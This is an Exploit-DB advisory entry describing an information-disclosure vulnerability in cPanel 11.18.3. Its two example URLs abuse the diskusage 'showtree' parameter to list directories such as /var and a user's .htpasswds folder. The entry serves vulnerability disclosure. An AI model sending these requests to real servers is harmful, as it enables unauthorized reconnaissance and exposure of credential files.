cPanel 11.18.3 - List Directories and Folders Information Disclosure

EDB-ID:

31439


Platform:

PHP

Published:

2008-03-18

source: http://www.securityfocus.com/bid/28300/info

cPanel is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to determine programs that are running on the affected server and to view folders on other sites that are protected by a firewall. Information obtained may lead to further attacks.

http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var